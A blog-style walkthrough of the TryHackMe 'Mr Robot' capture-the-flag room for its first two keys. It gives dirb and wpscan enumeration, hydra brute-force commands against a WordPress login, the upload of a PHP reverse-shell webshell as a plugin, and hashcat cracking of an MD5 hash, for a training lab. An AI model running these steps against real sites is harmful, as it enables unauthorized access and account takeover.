TryHackMe | Mr Robot CTF

0UR4N05

3 min readJan 8, 2021

hello guys , it’s your boy ouranos again and today we have the mr robot ctf

[ Key 1 ] :

After deploying the machine launch a dirb attack

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $sudo dirb http://<ip>

then you will see a directory called robots , this file is used to prevent google bots of indexing some server files to know more about it click here

there is two files a dictionary maybe we gonna use it later and the first key , don’t forget to download it

[ Key 2] :

having a wordlist in the challenge is a sign of bruteforce , we cant bruteforce the ssh because it’s closed so we should look for a login page

┌─[ouranos@parrot]─[~]
└──╼ $sudo dirb http://<IP>

after the dirb attack we found this :

/images (Status: 301)
/blog (Status: 301)
/sitemap (Status: 200)
/rss (Status: 301)
/login (Status: 302)
/0 (Status: 301)
/video (Status: 301)
/feed (Status: 301)
/image (Status: 301)
/atom (Status: 301)
/wp-content (Status: 301)
/admin (Status: 301)
/audio (Status: 301)
/intro (Status: 200)
/wp-login (Status: 200)
/css (Status: 301)
/rss2 (Status: 301)
/license (Status: 200)
/wp-includes (Status: 301)
/js (Status: 301)
/Image (Status: 301)
/rdf (Status: 301)
/page1 (Status: 301)
/readme (Status: 200)
/robots (Status: 200)
/dashboard (Status: 302)

dirb found a “wp-login” so we gonna try to enumerate users using wpscan

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $sudo wpscan — url http://10.10.224.73/ — enumerate u

but no users found so we gonna use hydra to bruteforce the login

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $hydra -L fsocity.dic -p password <IP> http-post-form “/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:F=Invalid username”

bingo we got our username , now we gonna try the password

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $hydra -l Elliot -P fsocity.dic <IP> http-post-form “/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:S=302”

and we got our password , so we gonna log in

now our goal is to upload a payload and get a reverse shell and to do this we gonna upload a payload in the plugin section and get the reverse shell

wordpress payload : /usr/share/webshells/php/php-reverse-shell.php

replace the IP with yours , zip it , upload it and listen for incoming connection then activate it

lets gooo we got a reverse shell , and our second key but we can’t read it , and we have a md5 password hash , so we gonna put it in a file and brute force it

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]
└──╼ $hashcat -m 0 md5.txt /usr/share/wordlists/rockyou.txt

after you get the password login in as the robot , and get the key

— this writeup is 2 keys maybe ill upgrade it later thank you for reading , 0UR4N05

TryHackMe | Mr Robot CTF

[ Key 1 ] :

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]└──╼ $sudo dirb http://<ip>

[ Key 2] :

┌─[ouranos@parrot]─[~]└──╼ $sudo dirb http://<IP>

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]└──╼ $sudo wpscan — url http://10.10.224.73/ — enumerate u

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]└──╼ $hydra -L fsocity.dic -p password <IP> http-post-form “/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:F=Invalid username”

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]└──╼ $hydra -l Elliot -P fsocity.dic <IP> http-post-form “/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:S=302”

┌─[ouranos@parrot]─[~/ctf/thm/mrrobot]└──╼ $hashcat -m 0 md5.txt /usr/share/wordlists/rockyou.txt

Written by 0UR4N05